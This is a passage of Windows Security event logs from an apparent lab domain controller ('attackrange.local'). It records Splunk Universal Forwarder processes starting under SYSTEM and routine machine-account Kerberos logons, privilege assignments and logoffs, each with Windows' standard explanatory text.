New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:11:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264426
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x79c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:11:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264427
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1a34
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:11:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264428
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1b7c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:11:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264430
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xca8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:11:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264429
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xf44
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:11:20 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264432
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Delegation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x80C997
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {91CA8262-9E50-FD4E-69C1-B65F14ACC796}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 62631
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:11:20 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264431
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x80C997
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:11:31 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264433
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x80C997
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:11:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264436
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x80D7B7
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:11:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264435
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x80D7B7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 62639
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:11:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264434
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x80D7B7
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:12:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264438
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xf7c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:12:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264437
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1690
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:12:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264439
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1834
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:12:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264440
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xde0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:12:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264441
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x18a4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:12:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264443
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1670
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:12:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264442
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1648
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:12:21 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264449
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8106EF
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:12:21 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264448
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8106EF
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 62647
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:12:21 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264447
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8106EF
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:12:21 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264446
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x810683
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:12:21 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264445
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x810683
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 62646
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
